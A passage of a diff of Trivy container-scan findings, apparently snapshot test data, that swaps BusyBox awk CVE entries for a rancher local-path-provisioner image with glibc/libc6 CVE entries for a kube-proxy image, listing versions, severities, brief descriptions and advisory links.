"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + }, + { + "type": "URL", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42381", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42381", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42381", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42381", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42382", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42382", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "category": "Vulnerability", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42382", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42382", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42383", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42383", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-42383", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42383", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42384", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42384", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42384", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42384", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42385", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42385", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42385", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42385", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42385", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5768-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42386", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42386", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", 